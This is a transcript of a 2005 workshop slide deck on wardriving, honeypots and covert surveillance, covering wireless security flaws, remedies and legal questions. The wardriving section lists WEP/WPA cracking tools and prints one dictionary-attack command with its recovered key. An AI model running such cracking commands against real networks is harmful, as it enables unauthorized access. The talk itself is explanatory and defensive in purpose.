hacking, tracking, and baiting surveillance, wardriving and honeypot technologies
DESCRIPTION
Hacking, Tracking, and Baiting Surveillance, Wardriving and Honeypot Technologies. Larry Korba Institute for Information Technology National Research Council of Canada. PST 2005 Workshop, October 12, 2005. Overview. Goal Wardriving Honeypots Other Surveillance Techniques Surreptitious - PowerPoint PPT PresentationTRANSCRIPT
Hacking, Tracking, and BaitingSurveillance, Wardriving and Honeypot
Technologies
Larry KorbaInstitute for Information Technology
National Research Council of Canada
PST 2005 Workshop, October 12, 2005
Overview
• Goal
• Wardriving
• Honeypots
• Other Surveillance Techniques– Surreptitious– Organization
• Conclusions
GOAL
• Describe some “interesting” technologies related to surveillance,– and what to expect next
• Raise privacy, responsibility, legal questions
Wardriving
• In the News
Florida man charged with stealing WiFi signal
July, 2005
How vulnerable is Wi-Fi Authentication?
November, 2004
Wardriving around town
February, 2005
Wi-Fi Security Wakes Up to Reality
June, 2005
Wardriving - Background
• Wi-Fi: Wireless Fidelity– Wireless network communication (GHz range)– Wireless Access points provide bridge to
Internet
• Problems:– Network access through thin air– Wireless networks often configured without any
security– Commonly used Wi-Fi security protocols broken– Looking for wireless access points is fun!– Using them is… illegal? Immoral?
Wardriving – Technologies
• Antenna• Powerful
SensitiveWi-FiCards
Wardriving – Technologies
• WEP 40 and 104 bit (+24 bit initialization vector = 64 bit/128 bit)
• Poor implementation (2001), capture 5 million packets, attach IV in clear
• Firmware improvements, then Korek 2004: WEP statistical cryptanalysis about 2 million packets required to break WEP
• WPA Personal (WPA-PSK) Attack found in 2003, Tools appeared in 2004, WPA Cracker, WPAtty (Brute force, dictionary attacks on WPA-PSK four-way handshake (works on weak pass phrases)
• Aircrack, WepLab, Airsnort, Kismet, Decrypt, among others (MAC address spoofing)
# decrypt -f /usr/dict/words -m 00:02:2D:27:D9:22 -e encrypted.dump -d [RETURN] out.dump Found key: Hex - 61:6c:6f:68:61, ASCII - "aloha"
Wardriving: Results?• Coverage maps
Wardriving – Remedies
• Security Enabled, WEP, WPA (Choose strong key) Change it regularly
• Ensure admin password is enabled• Enable MAC address authentication• Use VPN access
Wardriving – Other Remedies
• Conventional– Radius server– Security audit: Wireless AP detection, WEP/WPA strength
testing, coverage mapping• Others
– Antenna design– Shielding
• Windows, Walls• Paint? Forcefieldwireless.com
• Future– Better AP configuration (secure out of the box)– Intel range determination 1’ over 231’
• Mapping wireless: alternative to GPS (Microsoft)– WPA2 improvements?
• Responsibility? Laws? Morality?
Honeypots
• News Items…
‘Honeymonkeys’ find web threats
Skype Honeypot sn
ares dirt
y IMers
New Gatesweeper firewall collects
information about attackers
Cops tempt crook with technology
Avoiding Sticky Legal Traps:
Hackers have rights too! How can you
deploy honeypots without running afoul
of the law.
Wi-Fi ‘WarTrappers’nab drive-by hackers
Honeypots – Background
• Definition/Description/Origin– “An evening with Bereford: In which a cracker is lured, endured
and studied” Bill Cheswick, 1991– Any system resource whose value lies: in being probed, attacked,
or compromised ; in unauthorized or illicit use of that resource– Don’t solve a particular problem, but contribute to Sec. Arch.
• Not for prevention
• Ineffective against automated attacks
– Provide early warning, prediction– Discover new tools/tactics– Track behavior patterns– Develop forensic analysis skills– Low and High interaction types
Honeypots- Application
• Capture low-hanging fruit
• Network configurations• Emulation• OS with bugs• Open ports…
Honeypots – Spin-offs/Future
• Further Honeypot/Honeynet development– Integrated, proactive 0-day security response– GHH: Google Hack Honeypot
• Honeymonkey– Web spider (client) (unpatched XP)– Gathers malicious code hosted by web servers
• Technology “traps”– Automobiles (Black Box and Bait)
Other Surveillance Techniques
• Keystroke monitoring (Historical and present day (surreptitious screen shots, keystroke monitoring)
• Trojans, rootkits, backdoors via web and email• Email monitoring
– Metalincs– Smarsh– SpectorSoft
• Instant Messaging– IMbrella– Global Relay
• File usage• Network monitoring• Government Surveillance• Google!
• Legal Issues remain!
The Bottom Line
• Surreptitious monitoring and network access– There are many ways, There will be more
• Who is responsible? What is the law?– Privacy protection?
• Is there a “Reasonable Expectation for Privacy” in network related activities?
– Entrapment?• Do possible network intruders have rights?
– If you operate an open wireless access point are you offering a service?
– Jurisdictional issues